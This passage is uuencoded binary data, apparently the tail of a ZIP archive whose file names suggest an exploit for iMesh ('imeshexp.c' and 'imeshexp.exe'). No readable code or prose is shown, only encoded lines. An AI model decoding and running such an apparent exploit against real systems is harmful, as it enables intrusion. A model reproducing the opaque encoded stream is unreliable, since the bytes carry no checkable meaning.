MQIV&">9R]@;/=[C_O;>-4G:LD_E>?[CXG/5`@O5`E[.[<?*,P^%7&&G.03L>
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
C,P``:6UE<VAE>'`N8U!+!08``````@`"`'(````A/0``````
`
end
